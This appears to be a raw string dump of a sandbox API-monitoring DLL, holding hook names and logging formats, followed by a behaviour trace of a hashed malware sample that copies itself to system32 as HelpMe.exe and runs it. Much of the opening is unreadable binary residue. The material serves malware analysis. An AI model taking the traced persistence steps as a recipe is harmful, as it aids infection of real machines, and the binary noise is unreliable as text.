\]0tt8{ud
j&hH(3
Z(!JIH
U.*?>=u
 L_43N
].#GFE
(LV<;F
ccd Cl
t,qrd	l
[%<hsp
VD>s0R
(ctrUc
9>4?'#r|
d",VwJ
n`Name
WSBESS
BddA54
08xH,Hd
6OeJ(#%s
es",HK
t	WFpG
e`X$M7P <
X{",&l
_-s"+"P~J$
**,"QU6Y-
>KG&DJ
}*%w",W?
zvIce;{
.mrv)c
X{",&%
	[erVi
Mp%08|W6JtRQu
iJp3Qd
Q*","`&
Xl","e
C8x-08
1]RE#,W8D
_$"Ckn
zvikeX$XD 2(
}XJD%%
Q*GAVL H-
&&0,du8MC
_*/"wS
Q*A4S$APG2
)ZK7B<
_$#EbM
>KG&IJ
/MbY8J
8FA'S+7eZU
M0x#,"
_-s",#P~J
>zeaue>
Q*lpQu
X{",&%
P6%s"<W{
W;J2VK\
_dpSuB>r
/ML!E+
_[V6T-
X{#Y5M
/ML!E=_
_[]6T-G
>Il*Z)
**,"FQ<V=
%>%wSW
/?2Eq%
/d Eq%
/|rSu6
!B<qT0
~b|#55
jY#ub(
h	(V2}
F-),.t
(pr-2!
]v?bu"
3!!#<s
.MT	-2
h$i^d=
y}}?5!
Z!#O^T
vy#r2~
|H5,.w
7)4#<p
x+Oid=
vI#r2~
|d4,.w
!V%f#<
zr(,.w
7b|#|"
bCr-2>
Q%"ds&
%0u1(*
8*uvcp
ti5uu 
+a'r2~
.+2E`d
tM`'y2
@ <J	W <J!e",
iG?Ms*,"
m`+oema
B/#D"*,"
#<Jnmtw
C$U!N]E
$cJ,*%d
iG?Ms*
TB$Dgwn
2F#Md*,"
#V)IDUR
r=V%{"
{ eide
$cJ,*%d
2&n	dDib
#<JFIIL
ME:E*,"
#<JlxBa
#<JRmad
TS+E[S"
e=V0p%0
vcJ,*dw
,.Xx-08
-2Md*,"
#x.ide-
#D"Lel
","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileW","SUCCESS","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","DeleteFileW","FAILURE","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_LOGOFF
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_REBOOT
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
GENERIC_WRITE
INTERNET_FLAG_EXISTING_CONNECT
EWX_RESTARTAPPS
SHTDN_REASON_MAJOR_HARDWARE
"%s","%d","%s","%d","filesystem","CopyFileA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
SERVICE_CONTROL_NETBINDENABLE
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
SHTDN_REASON_MAJOR_OPERATINGSYSTEM
"%s","%d","%s","%d","filesystem","CopyFileW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
SHTDN_REASON_MAJOR_OTHER
"%s","%d","%s","%d","filesystem","CopyFileW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
SHTDN_REASON_MAJOR_POWER
"%s","%d","%s","%d","filesystem","CopyFileExA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
SHTDN_REASON_MAJOR_SOFTWARE
"%s","%d","%s","%d","filesystem","CopyFileExA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
SHTDN_REASON_MAJOR_SYSTEM
"%s","%d","%s","%d","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","ReplaceFileA","SUCCESS","","lpReplacedFileName->%s","lpReplacementFileName->%s"
WH_CALLWNDPROCRET
"%s","%d","%s","%d","filesystem","ReplaceFileA","FAILURE","","lpReplacedFileName->%s","lpReplacementFileName->%s"
WH_DEBUG
"%s","%d","%s","%d","filesystem","ReplaceFileW","SUCCESS","","lpReplacedFileName->%ws","lpReplacementFileName->%ws"
"%s","%d","%s","%d","filesystem","ReplaceFileW","FAILURE","","lpReplacedFileName->%ws","lpReplacementFileName->%ws"
"%s","%d","%s","%d","device","DeviceIoControl","FAILURE","","hDevice->0x%08x","dwIoControlCode->0x%08x","lpInBuffer->0x%08x","nInBufferSize->0x%08x","lpOutBuffer->0x%08x","nOutBufferSize->0x%08x","lpBytesReturned->0x%08x","lpOverlapped->0x%08x"
"%s","%d","%s","%d","device","DeviceIoControl","SUCCESS","","hDevice->0x%08x","dwIoControlCode->0x%08x","lpInBuffer->0x%08x","nInBufferSize->0x%08x","lpOutBuffer->0x%08x","nOutBufferSize->0x%08x","lpBytesReturned->0x%08x","lpOverlapped->0x%08x"
GENERIC_READ
GENERIC_READ | GENERIC_WRITE
SERVICE_DEMAND_START
SERVICE_SYSTEM_START
SC_MANAGER_ENUMERATE_SERVICE
SC_MANAGER_QUERY_LOCK_STATUS
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_QUERY_CONFIG
SERVICE_QUERY_STATUS
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
GENERIC_READ
SERVICE_CONTROL_NETBINDREMOVE
SERVICE_CONTROL_PAUSE
SERVICE_CONTROL_STOP
READ_CONTROL
SEMAPHORE_ALL_ACCESS
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_KEEP_CONNECTION
INTERNET_FLAG_NO_AUTH
INTERNET_FLAG_NO_AUTO_REDIRECT
INTERNET_FLAG_NO_CACHE_WRITE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PRAGMA_NOCACHE
INTERNET_FLAG_RAW_DATA
INTERNET_FLAG_RELOAD
INTERNET_FLAG_SECURE
0x%08x
EWX_POWEROFF
EWX_SHUTDOWN
0x%08x
SHTDN_REASON_MAJOR_APPLICATION
SHTDN_REASON_MAJOR_LEGACY_API
0x%08x
WH_CALLWNDPROC
WH_CBT
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER
kernel32.dll
CreateProcessInternalW
C:\cuckoo\
%slogs\%d.csv
RSDSHGjl
C:\Documents and Settings\emartinez\Escritorio\cmonitor\Release\cmonitor.pdb
ExitProcess
CreateMutexW
CopyFileExW
CreateRemoteThread
WriteFile
LoadLibraryW
ReadProcessMemory
TerminateProcess
ReplaceFileW
ReadFile
CreateFileW
OpenMutexW
GetProcAddress
ReadFileEx
VirtualAllocEx
LoadLibraryA
DeviceIoControl
IsDebuggerPresent
WinExec
WriteFileEx
DeleteFileW
GetCurrentProcessId
MoveFileWithProgressW
WriteProcessMemory
CreateThread
WideCharToMultiByte
GetSystemTime
GetCurrentProcess
Process32First
WaitForSingleObject
GetLastError
Process32Next
GetExitCodeThread
GetModuleHandleA
CreateToolhelp32Snapshot
DuplicateHandle
CloseHandle
MultiByteToWideChar
CreateFileA
SetFilePointer
WaitNamedPipeW
KERNEL32.dll
FindWindowA
SetWindowsHookExW
SetWindowsHookExA
ExitWindowsEx
FindWindowW
USER32.dll
CreateServiceW
OpenServiceA
DeleteService
OpenSCManagerW
OpenServiceW
RegSetValueExA
RegCreateKeyExW
CreateServiceA
RegQueryValueExW
RegDeleteKeyA
RegDeleteKeyW
StartServiceA
RegCreateKeyExA
RegOpenKeyExA
StartServiceW
OpenSCManagerA
RegEnumValueW
RegOpenKeyExW
ControlService
RegEnumKeyExW
RegSetValueExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExA
SHELL32.dll
WS2_32.dll
InternetOpenUrlW
WININET.dll
URLDownloadToFileW
urlmon.dll
GetTickCount
VirtualProtect
OutputDebugStringA
HeapFree
GetCurrentThreadId
DecodePointer
GetCommandLineA
HeapReAlloc
UnhandledExceptionFilter
SetUnhandledExceptionFilter
EncodePointer
IsProcessorFeaturePresent
HeapAlloc
HeapCreate
HeapDestroy
RaiseException
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetModuleHandleW
SetLastError
InterlockedDecrement
SetHandleCount
GetStdHandle
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
DeleteCriticalSection
GetModuleFileNameA
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
EnterCriticalSection
LeaveCriticalSection
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
HeapSize
GetModuleFileNameW
RtlUnwind
SetStdHandle
WriteConsoleW
LCMapStringW
GetStringTypeW
FlushFileBuffers
0123456789abcdef00
##%%&'%#&'&'
 !"#$%&'()*+,-./0123456789
 !"#$%&'()*+,-./
 !"#$%&'()*+,-./012345678
 !"#$%&'()*+
,-./0123456789:;
 !"#$%&'(
$%&'()*+,-./0123
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGXZ
!"#$%&'()*+,-.
/0123456789
<=>?@ABCDE
FGHIJKLMNO
PQRSTUVWXY
 !"#$%&'()
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdef
ghijklmnopqrstuvwxyz{|}~
 !"#$%&
'()*+,-
./01234
56789:;
<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`
abcdefghijklmnopqrstuvwxyz{|}~
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
31Z1c1w3
6.6?6P6a6r6
9$:E:T:
<(=D=\=`=d=h=l=
:D;H;L;P;T;X;\;`;
3.4Q4X4@5
3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
41585P5T5X5
70:4:8:<:@:D:H:L:P:T:X:\:`:
=%=j>t>
242;2C2H2L2P2y2
2*3034383<3
3'4Y4`4d4h4l4p4t4x4|4
7M7S7X7`7p7z7
7;8s8x8
9L9R9X9m9
9&:S:#;);5;l;
<Y=a=v=
>K?Z?u?
>!>g>m>w>o?{?
0o1t1}1
122a2g2v2
2/3;3B3N3T3`3f3o3u3~3
444t4z4
576G6M6Y6_6o6u6{6
7!7&7,70767;7A7F7U7k7q7y7~7
838<8H8
:3:>:X:c:k:{:
;#<h<o<
>(>M>X>g>
2"2'2H2M2q2
6*6S6[6
020D0J0d0s0
1$1.1T1
5)535F5j5
858N8j8s8y8
<C<I<O<_<j<~=
:B;b;g;
<[<s<}<
>1>?>E>h>o>
0?0E0M0
0_1h1n1
455H5`5
7!8L8m8v8
2*2<2N2`2r2
3 3'3.363>3F3R3[3`3f3p3y3
4&4+4<4D4J4T4Z4d4j4t4}4
7U8o8x8
020T0a0x0
2:2Z2z2
3:3Z3z3
5!5J5j5
606S6v6
6"7E7h7
878W8w8
9&9I9l9
:2:O:l:
;*;J;g;
<-<M<m<
=3=S=s=
?(?C?j?
*0J0j0
202P2k2
3#3@3[3
5(5/5=5D5R5Y5g5n5|5
6$6+696@6N6U6c6j6x6
7 7'757<7J7Q7_7f7t7{7
8#81888F8M8[8b8p8w8
8%9+999C9K9Q9X9f9l9s9
:#:):0:>:D:K:Y:_:f:t:z:
;#;1;7;>;L;R;Y;g;m;t;
<!<'<.<<<B<I<W<]<d<r<x<
=!=/=5=<=J=P=W=e=k=r=
>">(>/>=>C>J>X>^>e>s>y>
>(?.?3?[?m?
0%0+050L0
1%1+151L1
2&2J2P2V2`2w2
3&3,313;3\3b3g3q3
4#4)434P4V4[4e4{4
5A5G5L5V5w5}5
5%6I6O6U6_6
6%7I7O7U7_7
778q8w8|8
:H;N;T;^;
<8=>=D=N={=
0 0*0S0Y0^0h0~0#1]1c1h1r1
4$4.4O4U4Z4d4z4
4#5]5c5i5s5
8%8+858V8\8b8l8
;$;*;0;:;P;U;g;
<N<T<Z<d<
=%>+>1>;>Q>V>h>$?
0^1d1i1s1
1A2b2h2n2x2
4%424L4r4
4-5l5r5x5
93999>9K9d9
:P:V:\:f:
:M;r;x;};
<L<-=3=9=C=Z=
22282>2K2e2
7?7E7J7T7j7
8M8S8X8b8
8Q9u9{9
=)=F=L=Q=[=q=
>B>H>M>W>x>~>
>-?R?X?]?g?
=0b0h0m0w0
0M1r1x1}1
4V4\4a4k4
5 6'6,6P6W6\6
7@7G7L7p7w7|7
80878<8`8g8l8
8 9'9,9P9W9\9
:@:G:L:p:w:|:
;0;7;<;`;g;l;
; <'<,<P<W<\<
=@=G=L=p=w=|=
>0>7><>`>g>l>
> ?'?,?P?W?\?
0@0G0L0p0w0|0
10171<1`1g1l1
1 2'2,2P2W2\2
3@3G3L3p3w3|3
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3H3L3P3T3`3d3
6$6,646<6D6L6
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6
5 585<5T5d5h5|5
6$6,6@6`6|6
707P7p7
808L8P8p8
:<:@:H:L:
:8;<;@;D;H;L;P;X;\;
<l<p<t<x<|<
=$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
?0?4?<?@?l?p?x?|?
\0`0d0h0l0p0t0x0|0
1$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3,30383<3h3l3t3x3|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5l5p5\6`6d6h6l6p6t6x6|6
74787@7D7p7t7|7
: :$:(:,:0:4:8:<:@:D:H:L:P:T:(;,;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
=(>,>0>4>8><>@>D>L>P>
?(?0?4?
4080<0@0D0H0L0P0X0\0x0
2 2$2(2,20242<2@2
3 3(3,3p3t3x3
3 4$4(40444x4|4
4(5,50585<5
5064686@6D6
687<7@7H7L7
7084888@8D8
889<9@9H9L9
9@:D:H:P:T:
;@<D<H<P<T<
=H=L=P=X=\=
>P>T>X>`>d>
?X?\?`?h?l?
0`0d0h0p0t0
1 1$1(10141x1|1
1(2,20282<2
2H3L3P3T3\3`3
3h4l4p4t4|4
4L5P5T5\5`54686<6@6D6H6L6P6X6\6
7T7X7`7d7
8 8$8(8,80848<8@8
8D9H9L9P9T9\9`9
90:4:8:<:D:H:
:0;4;<;@;
;4<8<<<D<H<
< =$=,=0=t=x=|=
>L>P>T>\>`>
> ?$?(?0?4?x?|?
0P1T1X1\1`1h1l1
2 2$2\2`2h2l2
3`3d3h3p3t3
4 4$4h4l4p4x4|4
5 5(5,5p5t5x5
5 6$6(60646x6|6
6074787<7@7D7H7L7T7X7
9<:@:D:H:L:P:X:\:
= =$=(=0=4=
?`?d?h?l?t?x?
0 0$0(0,0004080@0D0
1P1T1\1`1
2L2P2X2\2
3H3L3T3X3
4D4H4P4T4
4@5D5L5P5|5
6X6\6d6h6
7l7p7t7|7
8$8(8l8p8x8|8
9 9$9h9l9t9x9
:0:8:<:h:p:t:|;
<0<4<<<@<l<p<x<|<
=D=H=P=T=
>H>P>T>
>(?0?4?`?h?l?
0@0H0L0x0
0 1(1,1X1`1d1
282@2D2p2x2|2
3 3$3P3X3\3
40484<4h4p4t4
5L5P5X5\5
5$6(60646l6p6x6|6
7D7H7P7T7
8 8(8,8d8h8p8t8
9<9@9H9L9
:0:8:<:h:p:t:
;<;@;H;L;
< <$<\<`<h<l<
<4=8=@=D=
=8><>@>H>L>x>
>,?0?8?<?h?p?t?
0H0P0T0
1`1d1h1p1t1
2 2$2h2l2p2x2|2
3 3(3,3p3t3x3
3 4$4(40444x4|4
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7p7t7
7D8H8L8P8X8\8
8d9h9l9p9t9x9
;H<L<P<T<\<`<
=h=l=p=t=|=
=P>T>X>\>d>h>
? ?$?(?,?0?4?<?@?
0 0$0(0,0004080@0D0
1 1$1(1,1014181<1D1H1p2t2|3
5P6T6X6\6`6d6l6p6L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=H=L=
X6X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9(989H9X9|9
;(;,;0;4;8;<;@;D;H;L;P;
eekxYC.dll
"20190111212121.331","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->6144","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.331","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00260000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->377102","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->5390","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->9998","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->26674","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Borland\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Borland\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Borland\Delphi\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->1048576","flAllocationType->0x00002000","flProtect->0x00000001"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00150000","dwSize->16384","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00250000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000040"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000a0","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->268"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000098","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->32094"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->32094"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","OpenMutexW","SUCCESS","0x000000ac","dwDesiredAccess->0x00120001","lpName->ShimCacheMutex"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000000bc","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Cache"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x77dd0000","lpFileName->advapi32.dll"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateProcessInternalW","SUCCESS","1400","lpApplicationName->(null)","lpCommandLine->C:\WINDOWS\system32\HelpMe.exe"
